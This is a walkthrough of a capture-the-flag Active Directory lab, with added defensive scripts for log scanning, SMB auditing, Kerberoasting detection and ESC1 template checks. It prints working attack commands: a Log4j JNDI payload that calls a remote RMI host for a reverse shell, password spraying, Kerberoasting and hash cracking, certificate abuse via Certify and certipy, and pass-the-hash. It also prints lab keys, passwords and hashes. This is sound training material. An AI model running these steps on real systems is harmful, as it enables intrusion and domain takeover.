春秋云境 Certify
flag01
fscan scan

```
fscan version: 1.8.2
start infoscan
(icmp) Target 39.98.115.180 is alive
[*] Icmp alive hosts len is: 1
39.98.115.180:22 open
39.98.115.180:80 open
39.98.115.180:8983 open
```
Visiting 39.98.115.180:8983 shows a Solr admin interface.

```
${jndi:rmi://ip:1099/7dbozo}
```

https://github.com/welk1n/JNDI-Injection-Exploit

A search shows that this Solr version carries the known (n-day) Log4j JNDI lookup vulnerability. Start the malicious JNDI server to catch a reverse shell, paste the payload into the Core Admin page, and click Add Core.

Once the shell is in, bring it online in the C2 and set up persistence. It is not root, so privilege escalation is probably required. Listing SUID binaries turns up nothing usable; `sudo -l` shows that grc can be run without a password.

Try escalating through grc.
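The Solr step above works because Log4j resolved `${jndi:...}` lookups in a field the requester controls (the core name). The defender-side counterpart is to look for exactly that pattern in the request log. The following is an added example, not part of the original writeup or of Solr itself: it parses constructed Jetty/Solr access-log lines (sample IPs and paths are invented), URL-decodes each request, and reports any JNDI lookup with its scheme and target, plus any other `${...}` lookup in a user-supplied field as a lower-severity hit.

```python
import re
from urllib.parse import unquote

# Constructed request-log lines in NCSA style (sample values, not from the lab).
# The second line carries the lookup URL-encoded, the third carries it in plain text.
SOLR_ACCESS_LOG = """\
172.22.9.1 - - [03/Aug/2024:18:02:11 +0000] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 200 512
198.51.100.7 - - [03/Aug/2024:18:05:42 +0000] "GET /solr/admin/cores?action=CREATE&name=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.5%3A1099%2Fabc%7D HTTP/1.1" 400 87
198.51.100.7 - - [03/Aug/2024:18:06:03 +0000] "GET /solr/admin/cores?action=CREATE&name=${JNDI:ldap://203.0.113.5:1389/x} HTTP/1.1" 400 87
172.22.9.26 - - [03/Aug/2024:18:07:00 +0000] "GET /solr/core1/select?q=*:*&wt=json HTTP/1.1" 200 2048
"""

# ${jndi:<scheme>://<host[:port]>...}, case-insensitive, tolerant of stray whitespace
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:\s*//\s*([^/\s}]+)", re.IGNORECASE)
# any Log4j-style lookup at all; worth a look when it appears in a user-controlled field
LOOKUP_RE = re.compile(r"\$\{[^}]*\}")
LINE_RE = re.compile(r'(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)')

def scan_access_log(text):
    """Return one finding per request whose decoded URL contains a lookup expression."""
    findings = []
    for line in text.strip().splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        src, ts, method, url = m.groups()
        decoded = unquote(url)                 # payloads are usually percent-encoded
        hit = JNDI_RE.search(decoded)
        if hit:
            findings.append({"src": src, "time": ts, "method": method, "url": decoded,
                             "severity": "high", "scheme": hit.group(1).lower(),
                             "target": hit.group(2)})
        elif LOOKUP_RE.search(decoded):
            findings.append({"src": src, "time": ts, "method": method, "url": decoded,
                             "severity": "medium", "scheme": None, "target": None})
    return findings

if __name__ == "__main__":
    for f in scan_access_log(SOLR_ACCESS_LOG):
        print(f"[{f['severity']}] {f['src']} {f['time']} {f['scheme']} -> {f['target']}")
```

A hit here means the request reached the application; whether the lookup actually fired depends on the Log4j build. The fix is the patched Log4j/Solr release; the Solr project's interim mitigation for affected versions was adding `-Dlog4j2.formatMsgNoLookups=true` to `SOLR_OPTS`, and outbound LDAP/RMI from the Solr host should be blocked at the firewall regardless.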
flag02
Internal network scan results:

```
172.22.9.19:80 open
172.22.9.47:445 open
172.22.9.26:445 open
172.22.9.7:445 open
172.22.9.26:139 open
172.22.9.47:139 open
172.22.9.26:135 open
172.22.9.7:135 open
172.22.9.7:80 open
172.22.9.47:22 open
172.22.9.19:22 open
172.22.9.47:21 open
172.22.9.47:80 open
172.22.9.7:139 open
172.22.9.7:88 open
172.22.9.19:8983 open
[*] NetBios: 172.22.9.7 [+]DC XIAORANG\XIAORANG-DC
[*] NetInfo:
[*]172.22.9.26
   [->]DESKTOP-CBKTVMO
   [->]172.22.9.26
[*] NetInfo:
[*]172.22.9.7
   [->]XIAORANG-DC
   [->]172.22.9.7
[*] WebTitle: http://172.22.9.19 code:200 len:612 title:Welcome to nginx!
[*] WebTitle: http://172.22.9.47 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works
[*] NetBios: 172.22.9.26 DESKTOP-CBKTVMO.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios: 172.22.9.47 fileserver Windows 6.1
[*] 172.22.9.47 (Windows 6.1)
[*] WebTitle: http://172.22.9.19:8983 code:302 len:0 title:None 跳转url: http://172.22.9.19:8983/solr/
[*] WebTitle: http://172.22.9.7 code:200 len:703 title:IIS Windows Server
[*] WebTitle: http://172.22.9.19:8983/solr/ code:200 len:16555 title:Solr Admin
[+] http://172.22.9.7 poc-yaml-active-directory-certsrv-detect
```
fscan reports an information-disclosure finding (the certsrv detection), but after reading the PoC it looks like a false positive. Browsing the open web services turns up nothing attackable. There is a file server, so scan it further with nmap.

```
Host script results:
| smb2-time:
|   date: 2024-08-03T17:59:02
|_  start_date: N/A
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: fileserver
|   NetBIOS computer name: FILESERVER\x00
|   Domain name: \x00
|   FQDN: fileserver
|_  System time: 2024-08-04T01:59:06+08:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
```

The output shows the scan ran as the guest account, which suggests unauthenticated access. Try connecting with a script.

Unauthenticated access is confirmed: flag02 is in the secret share, and the personnel.db file was retrieved as well.
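Two lines in that nmap output are the whole story: `account_used: guest` and signing that is disabled (SMB1) or merely optional (SMB2). As an added example, not part of the original writeup, here is a small checker that parses nmap's `smb-*` host-script output (the sample below is constructed in the same shape, with the lab's values) and turns those lines into concrete findings with the matching Samba or Windows setting to change.

```python
import re

# Constructed sample in the shape of nmap's smb host-script output (lab values from the scan above).
NMAP_SMB = """\
Host script results:
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: fileserver
|   NetBIOS computer name: FILESERVER\\x00
|_  System time: 2024-08-04T01:59:06+08:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
"""

SCRIPT_HEADER = re.compile(r"^([a-z][a-z0-9-]*):$")   # e.g. "smb-security-mode:"

def parse_nmap_smb(text):
    """Return {script: {key: value, "notes": [...]}} from nmap's normal-output script block."""
    scripts, current = {}, None
    for raw in text.splitlines():
        if not raw.startswith("|"):
            continue                                  # "Host script results:" etc.
        body = raw.lstrip("|_ ").rstrip()
        header = SCRIPT_HEADER.match(body)
        if header:
            current = scripts.setdefault(header.group(1), {"notes": []})
        elif current is None:
            continue
        elif ": " in body:
            key, value = body.split(": ", 1)
            current[key] = value
        else:
            current["notes"].append(body)             # dialect lines, free-text status lines
    return scripts

def assess_smb(scripts):
    """Map the parsed scan to findings; each names the setting that closes it."""
    findings = []
    mode = scripts.get("smb-security-mode", {})
    if mode.get("account_used") == "guest":
        findings.append("guest session accepted: Samba 'map to guest = Never' / "
                        "'restrict anonymous = 2'; Windows: disable the Guest account")
    if mode.get("message_signing", "").startswith("disabled"):
        findings.append("SMB1 signing disabled (relay-prone): Samba 'server signing = mandatory'; "
                        "Windows LanmanServer RequireSecuritySignature=1")
    notes = " ".join(scripts.get("smb2-security-mode", {}).get("notes", []))
    if "not required" in notes:
        findings.append("SMB2 signing not required: require it on the server side")
    os_name = scripts.get("smb-os-discovery", {}).get("OS", "")
    if "Samba" in os_name:
        findings.append(f"Samba build disclosed: {os_name}; verify it is a supported release")
    return findings

if __name__ == "__main__":
    for line in assess_smb(parse_nmap_smb(NMAP_SMB)):
        print("-", line)
```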
flag03
Opening the db file reveals a pile of usernames and passwords. First try a round of crackmapexec brute-forcing.

```
proxychains4 crackmapexec smb 172.22.9.1/24 -u user.txt -p pass.txt --continue-on-success 2>/dev/null
```

I recommend spraying one host at a time: when it reaches the file server every attempt succeeds, which is very confusing.

```
xiaorang.lab\zhangjian:i9XDE02pLVf
xiaorang.lab\liupeng:fiAzGwEMgTY
```

Try RDP login; the result is as follows.

Both accounts return the same result. Following the hint from flag02, the next step is to query SPNs, which calls for a short introduction to a few concepts.
Kerberos
Kerberos is the most common authentication protocol in domain environments. Authentication consists of three exchanges:
Authentication Service (AS) exchange (KRB_AS_*)
Ticket-Granting Service (TGS) exchange (KRB_TGS_*)
Client/Server (AP) exchange (KRB_AP_*)
Here we mainly care about the TGS exchange; the AS and the TGS are the two components of the KDC.
SPN
A Service Principal Name (SPN) is the unique identifier of a service instance; think of it as the ID card of a service inside the domain. Every service has a unique SPN, and when a service registers its SPN it is bound to an account, so the SPN ties a service instance to the account the service logs on with. One SPN maps to one account and one service, but one account can own several SPNs and services.
The important point is that any domain account can ask the DC for the SPNs of every domain user and perform a TGS exchange for them. The KRB_TGS_REP returns a TGS ticket for each queried account, and those tickets can then be fed to a cracking tool to recover the corresponding plaintext passwords.
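The exchange just described (Kerberoasting) is fully visible to the DC: every service ticket it issues is logged as Security Event 4769 with the requesting account, the service name and the ticket's encryption type, and a roasting run shows up as one account pulling RC4 (0x17) tickets for many user-account SPNs within seconds. The following detection is an added example, not part of the original writeup; the 4769 records are constructed (the extra account names are invented), reduced to the five fields the logic needs.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Event 4769 records: time, requesting account, service name, ticket encryption type, client IP.
# 0x17 is RC4-HMAC (crackable offline), 0x12 is AES256-CTS-HMAC-SHA1-96. Names other than the
# lab's are invented for this example.
EVENTS_4769 = """\
2024-08-03T18:40:01,liupeng@XIAORANG.LAB,zhangxia,0x17,172.22.9.47
2024-08-03T18:40:01,liupeng@XIAORANG.LAB,chenchen,0x17,172.22.9.47
2024-08-03T18:40:02,liupeng@XIAORANG.LAB,svc_sql,0x17,172.22.9.47
2024-08-03T18:40:02,liupeng@XIAORANG.LAB,svc_web,0x17,172.22.9.47
2024-08-03T18:41:15,wangwu@XIAORANG.LAB,XIAORANG-DC$,0x12,172.22.9.26
2024-08-03T18:42:00,wangwu@XIAORANG.LAB,svc_sql,0x12,172.22.9.26
2024-08-03T19:05:10,lisi@XIAORANG.LAB,svc_web,0x17,172.22.9.30
"""

RC4_HMAC = 0x17

def parse_4769(text):
    """Turn the CSV-style sample into event dicts with a real datetime and numeric etype."""
    events = []
    for line in text.strip().splitlines():
        ts, account, service, enc, ip = line.split(",")
        events.append({"time": datetime.fromisoformat(ts), "account": account,
                       "service": service, "enc": int(enc, 16), "ip": ip})
    return events

def detect_kerberoasting(events, window=timedelta(minutes=5), threshold=3):
    """Flag accounts that obtain RC4 service tickets for >= threshold distinct user-account
    services inside `window`. Machine accounts (name$) and krbtgt are skipped: their tickets
    are not practically crackable and would only add noise."""
    candidates = [e for e in events
                  if e["enc"] == RC4_HMAC
                  and not e["service"].endswith("$")
                  and e["service"].lower() != "krbtgt"]
    by_account = defaultdict(list)
    for e in sorted(candidates, key=lambda e: e["time"]):
        by_account[e["account"]].append(e)
    alerts = []
    for account, evs in by_account.items():
        flagged, start = set(), 0
        for end in range(len(evs)):                       # sliding time window
            while evs[end]["time"] - evs[start]["time"] > window:
                start += 1
            services = {e["service"] for e in evs[start:end + 1]}
            if len(services) >= threshold:
                flagged |= services
        if flagged:
            alerts.append({"account": account, "ip": evs[0]["ip"], "services": sorted(flagged)})
    return alerts

if __name__ == "__main__":
    for a in detect_kerberoasting(parse_4769(EVENTS_4769)):
        print(f"possible Kerberoasting by {a['account']} from {a['ip']}: {a['services']}")
```

The threshold and window are tunable; a single RC4 ticket (lisi above) is not alerted on, but in a domain where service accounts have AES enabled in msDS-SupportedEncryptionTypes any RC4 service ticket is itself worth a look. Long random passwords or gMSAs for SPN-bearing accounts make whatever is captured impractical to crack.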
The query results are as follows.

```
proxychains4 impacket-GetUserSPNs -request -dc-ip 172.22.9.7 xiaorang.lab/liupeng:fiAzGwEMgTY 2>/dev/null
proxychains4 impacket-GetUserSPNs -request -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf 2>/dev/null
```

```
$krb5tgs$23$*zhangxia$XIAORANG.LAB$xiaorang.lab/zhangxia*$13288c81c67ba7897cac2231d7ac9cb5$...
$krb5tgs$23$*chenchen$XIAORANG.LAB$xiaorang.lab/chenchen*$5199d92f23d1475890b372e8a7b0540d$...
```

```
hashcat -a 0 -m 13100 hash.txt ./rockyou.txt
```

Two passwords come out of the crack:

```
xiaorang.lab\zhangxia MyPass2@@6
xiaorang.lab\chenchen @Passw0rd@
```
RDP login succeeds, but the account has no permission to read the flag. Since there is a CA (certificate services) server, and given the challenge's name, check whether a certificate template is misconfigured.

```
Certify.exe find /vulnerable
```

Focus on whether these three attributes meet the ESC1 conditions:

```
msPKI-Certificate-Name-Flag: ENROLLEE_SUPPLIES_SUBJECT
mspki-certificate-application-policy: 客户端身份验证
Enrollment Rights: XIAORANG\Domain Users
```

A perfect match. Good, let's go.
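The three attributes above, plus the absence of manager approval or authorized signatures, are exactly the ESC1 preconditions, and the template is only exploitable when all of them hold at once. As an added example, not from the original writeup or from Certify, the following audit encodes those conditions for a template audit: the flag bits and EKU OIDs are the documented MS-CRTD values, and the three template records are constructed ("XR Manager" mirrors what Certify reported; "User" is a constructed template that builds its subject from AD; the third is XR Manager with CA manager approval switched on).

```python
# ESC1 preconditions expressed over the AD CS template attributes Certify reports.
# Flag bits and EKU OIDs are documented MS-CRTD values; the template records are constructed.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # bit in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002           # bit in msPKI-Enrollment-Flag: CA manager approval
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2": "Client Authentication",
    "1.3.6.1.5.2.3.4": "PKINIT Client Authentication",
    "1.3.6.1.4.1.311.20.2.2": "Smart Card Logon",
    "2.5.29.37.0": "Any Purpose",
}
LOW_PRIV_GROUPS = {"domain users", "domain computers", "authenticated users", "everyone"}

def esc1_reasons(template):
    """Return which of the four ESC1 preconditions the template meets."""
    reasons = []
    if template["name_flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        reasons.append("ENROLLEE_SUPPLIES_SUBJECT: requester chooses the subject and SAN")
    auth = [AUTH_EKUS[o] for o in template["ekus"] if o in AUTH_EKUS]
    if auth or not template["ekus"]:                  # an empty EKU list means "any purpose"
        reasons.append("authentication EKU: " + (", ".join(auth) or "none (usable for any purpose)"))
    if not template["enrollment_flag"] & CT_FLAG_PEND_ALL_REQUESTS and template["ra_signatures"] == 0:
        reasons.append("issued without manager approval or authorized signatures")
    low = [p for p in template["enroll_rights"] if p.split("\\")[-1].lower() in LOW_PRIV_GROUPS]
    if low:
        reasons.append("enrollable by low-privileged principals: " + ", ".join(low))
    return reasons

def is_esc1(template):
    # All four must hold together; removing any single one (e.g. requiring manager approval,
    # dropping ENROLLEE_SUPPLIES_SUBJECT, or restricting enrollment) closes the hole.
    return len(esc1_reasons(template)) == 4

def audit_templates(templates):
    return [t["name"] for t in templates if is_esc1(t)]

TEMPLATES = [
    # mirrors the three attributes Certify reported for "XR Manager"
    {"name": "XR Manager", "name_flag": 0x00000001, "enrollment_flag": 0, "ra_signatures": 0,
     "ekus": ["1.3.6.1.5.5.7.3.2"], "enroll_rights": ["XIAORANG\\Domain Users"]},
    # constructed: subject taken from AD (SUBJECT_REQUIRE_DIRECTORY_PATH | SUBJECT_ALT_REQUIRE_UPN)
    {"name": "User", "name_flag": 0x82000000, "enrollment_flag": 0, "ra_signatures": 0,
     "ekus": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.4.1.311.10.3.4"], "enroll_rights": ["XIAORANG\\Domain Users"]},
    # constructed: XR Manager after enabling "CA certificate manager approval"
    {"name": "XR Manager (approval)", "name_flag": 0x00000001, "enrollment_flag": 0x00000002,
     "ra_signatures": 0, "ekus": ["1.3.6.1.5.5.7.3.2"], "enroll_rights": ["XIAORANG\\Domain Users"]},
]

if __name__ == "__main__":
    for t in TEMPLATES:
        print(t["name"], "ESC1" if is_esc1(t) else "ok", esc1_reasons(t))
```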
```
Certify.exe request /ca:XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA /template:"XR Manager" /altname:administrator
```

The result is as follows.
```
C:\Users\Public>Certify.exe request /ca:XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA /template:"XR Manager" /altname:administrator

   Certify v1.1.0

[*] Action: Request a Certificates

[*] Current user context    : XIAORANG\zhangxia
[*] No subject name specified, using current context as subject.

[*] Template                : XR Manager
[*] Subject                 : CN=zhangxia, CN=Users, DC=xiaorang, DC=lab
[*] AltName                 : administrator

[*] Certificate Authority   : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA

[*] CA Response             : The certificate had been issued.
[*] Request ID              : 5

[*] cert.pem         :

-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAuFeHUOimAXdXIeX0QYZjFv3MRkvPLODA4QKxZ3fKWiJXfnWR
w6hTC+/RMWTdGWR7R97ybagQjKCxOO5IPuqxh+XX2s/aUfAZVd0+/HXD586+uK0U
+W2w7mwrfVYw2dja2+i8bpR6A/QROD3B6S9Ra0uuP04IpifmDIu2Mow6Yo9lwT7D
oIMqiKOPoSZQ2Tm5P/OtrfWDyU+qe8x6Ht4ovV2b9S+nnrUm6kPkotvHL465R46t
uxpLtZxV+E/zC/8p3vU3qsnaIBRc/h10LOUFCPiiNNvSd0tJWlk7f6KWt2lXmJSl
XWj/8C5n1r+R8KrgN0ccYn8mVLG5hljZ1fgF3wIDAQABAoIBAAP6L3s5acuCTaj3
kyuOwLiQRUYHALNRLhgsvLMkzILhVs3tr3VvPkt1oyfTq0mO93H3h3eCNskx9mDq
Ezj4S1hJRzz7WxSFf6ZwnZlI2S85MLg/U8KF8VlTkCSmJWut2BsCjH4+Sdun+m8i
NfrYAIO2IE5RWrJrDfWbVhUFHYVe1UanlurJDpOzBVFTiqJrYBkOPvpjHJwFS9Wk
cPvS1NQ0+gvK0Ud3swtMDhXvCmhVx9jWDPwYQFHBEi+g3ynnu6dZ7gi8mAVw/pC7
NOGBeCpfEqDmsay5QQVnBOVD3U0vgw78rK5hXIr29teInl0iw89aRAdirlgQQ6ll
GzmitaECgYEAyYV2Ix5CiKx+3vCG7ljQ50Bbu9JALfwffCbh1gA5IyVzLajCwu4K
7HG4wVrArH42R/Iq4KRxWosWWzTQ9PQNKvUp26/1+OjYf03PdceXiqC2VehewW+9
s62WyM9yYPApqEu9ZFjrWhvhcREiufWQLVflJkZEerruLAjhckVqD8cCgYEA6i0k
rR07rawOx80SiZ1gCVIWq9wN3hsOK6CLTBVDgCeztX3gNQXxGyaC6+InWojBx2Zt
P3vSggChgmwKQU1fbYR7z13tc36+lJhyoqg5/BDFMd7lm3RgAdJo9P2J6Bmopcuf
MIhI+iNThEKh7nmh803Os4xZf0pa9RxJTnImiSkCgYEAvpSsK/wjGhRgC8DXKrPu
JLUVzCPDtHl64TP4YiVl49o3+hde0XDD/eZyvtFv4/Gcrh/U8wwxc1qUcv8ZGn9v
sI+Y3X2klpjGnmZc69stctoYdlhCvJdLhZCGSDT/y7N1AgdW/n6lXVt+sipteAZH
Ksq0GKVdf+Am/JgNdb811eMCgYEAx0t6HjZ11r1KqvI1Z5be56/MCaEy0CaYbbqp
MiwakVO4lqo1CQswgdnJrDSBJ4Sh3jCmo1Oe+PLOgW+vXpoZr9wDfpzCe/uO+Gmx
jgq7pnEjUekP4bguCP7oQjAQkM5dgBSGO0iRSwiLiFEo/QrZMHa0hovYkwNV26qi
HLf7YdkCgYBRXkHSgvlvl72uSSIMMXD8lx4XGdo4sKlH44WioeL0M5t5aJiYVQvE
DfPePBRKim+PJiloeX0qIxSsEp89qRoN2cXdWpGqX916rz3nZKdQ9UG9g1LsGoyZ
BilSirIsDpFtR0oKCp8XyMzIuZ6mRUJNFWDWyfdN0Otj9JyPSyIelg==
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGQTCCBSmgAwIBAgITfgAAAAWHAI3RYCNargAAAAAABTANBgkqhkiG9w0BAQsF
ADBRMRMwEQYKCZImiZPyLGQBGRYDbGFiMRgwFgYKCZImiZPyLGQBGRYIeGlhb3Jh
bmcxIDAeBgNVBAMTF3hpYW9yYW5nLVhJQU9SQU5HLURDLUNBMB4XDTI0MDgwMzE4
NTgwNloXDTI1MDgwMzE4NTgwNlowUjETMBEGCgmSJomT8ixkARkWA2xhYjEYMBYG
CgmSJomT8ixkARkWCHhpYW9yYW5nMQ4wDAYDVQQDEwVVc2VyczERMA8GA1UEAxMI
emhhbmd4aWEwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQC4V4dQ6KYB
d1ch5fRBhmMW/cxGS88s4MDhArFnd8paIld+dZHDqFML79ExZN0ZZHtH3vJtqBCM
oLE47kg+6rGH5dfaz9pR8BlV3T78dcPnzr64rRT5bbDubCt9VjDZ2Nrb6LxulHoD
9BE4PcHpL1FrS64/TgimJ+YMi7YyjDpij2XBPsOggyqIo4+hJlDZObk/862t9YPJ
T6p7zHoe3ii9XZv1L6eetSbqQ+Si28cvjrlHjq27Gku1nFX4T/ML/yne9Teqydog
FFz+HXQs5QUI+KI029J3S0laWTt/opa3aVeYlKVdaP/wLmfWv5HwquA3RxxifyZU
sbmGWNnV+AXfAgMBAAGjggMPMIIDCzA9BgkrBgEEAYI3FQcEMDAuBiYrBgEEAYI3
FQiB3dAhhYHGIoPFkTqEjedRg9jIBiuBkpQlhInfBwIBZAIBBTApBgNVHSUEIjAg
BgorBgEEAYI3CgMEBggrBgEFBQcDBAYIKwYBBQUHAwIwDgYDVR0PAQH/BAQDAgWg
MDUGCSsGAQQBgjcVCgQoMCYwDAYKKwYBBAGCNwoDBDAKBggrBgEFBQcDBDAKBggr
BgEFBQcDAjBEBgkqhkiG9w0BCQ8ENzA1MA4GCCqGSIb3DQMCAgIAgDAOBggqhkiG
9w0DBAICAIAwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFM1ln9QLzaKk
KLs2gDx/+Tw9tmqFMCgGA1UdEQQhMB+gHQYKKwYBBAGCNxQCA6APDA1hZG1pbmlz
dHJhdG9yMB8GA1UdIwQYMBaAFFe6Z2kqz4ktl3hku7D+cH+iSYCiMIHaBgNVHR8E
gdIwgc8wgcyggcmggcaGgcNsZGFwOi8vL0NOPXhpYW9yYW5nLVhJQU9SQU5HLURD
LUNBLENOPVhJQU9SQU5HLURDLENOPUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2
aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPXhpYW9yYW5nLERD
PWxhYj9jZXJ0aWZpY2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9
Y1JMRGlzdHJpYnV0aW9uUG9pbnQwgcoGCCsGAQUFBwEBBIG9MIG6MIG3BggrBgEF
BQcwAoaBqmxkYXA6Ly8vQ049eGlhb3JhbmctWElBT1JBTkctREMtQ0EsQ049QUlB
LENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZp
Z3VyYXRpb24sREM9eGlhb3JhbmcsREM9bGFiP2NBQ2VydGlmaWNhdGU/YmFzZT9v
YmplY3RDbGFzcz1jZXJ0aWZpY2F0aW9uQXV0aG9yaXR5MA0GCSqGSIb3DQEBCwUA
A4IBAQADETRmjot+K43S5/SfkTCozzcSqu/RqT8Z/UBP1OTz9GPVLXp+bE665ZEf
8FRLoOOiQmCFuldH3eL379LpogpT71Ebo6hwjrlnP/LpL5b3m/spqxSW2CgE+BMe
ddL3DJAC2P5P18bGkDVrUp0yYYmsPc+2eeuVGcROcaSBe/WCopddYP8iQkVlR53Q
IyAatff+yMd7P6TjYLH2yXylLGZ3Z66Dy53c0wEZLC5IXOiY5MfhgJCHgEd4xQgQ
DhE8XcCRFldRWeUaUTe3VHaC5HnhJA+/3ZmruLdEPjxHZCFAombzoCuxLqsvEvwc
2liMB3A/cbWoZItBw59Sbfll6MY+
-----END CERTIFICATE-----

[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
```
Copy everything from -----BEGIN RSA PRIVATE KEY----- to -----END CERTIFICATE----- and save it as cert.pem.

```
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
```

This converts cert.pem to cert.pfx; no export password needs to be entered.

```
Rubeus.exe asktgt /user:administrator /certificate:administrator.pfx /dc:172.22.9.7 /ptt
```

That failed. Switch to another way of requesting the certificate.

List the vulnerable certificate templates:
```
proxychains4 certipy find -u 'zhangxia@xiaorang.lab' -password 'MyPass2@@6' -dc-ip 172.22.9.7 -vulnerable -stdout 2>/dev/null
```

Request the certificate again:

```
proxychains4 certipy req -u 'zhangxia@xiaorang.lab' -p 'MyPass2@@6' -target 172.22.9.7 -dc-ip 172.22.9.7 -ca "xiaorang-XIAORANG-DC-CA" -template 'XR Manager' -upn administrator@xiaorang.lab
```

This produces administrator.pfx; use the certificate to obtain the domain administrator's hash.

```
proxychains4 certipy auth -pfx administrator.pfx -dc-ip 172.22.9.7 2>/dev/null
```

The output is as follows.

```
[*] Using principal: administrator@xiaorang.lab
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@xiaorang.lab': aad3b435b51404eeaad3b435b51404ee:2f1b57eefb2d152196836b0516abea80
```

Pass-the-hash to take over the domain controller

```
proxychains4 impacket-smbexec -hashes :2f1b57eefb2d152196836b0516abea80 xiaorang.lab/administrator@172.22.9.7
```

```
type c:\users\administrator\flag\flag04.txt
```
flag04
```
proxychains4 impacket-smbexec -hashes :2f1b57eefb2d152196836b0516abea80 xiaorang.lab/administrator@172.22.9.26
```

```
type c:\users\administrator\flag\flag03.txt
```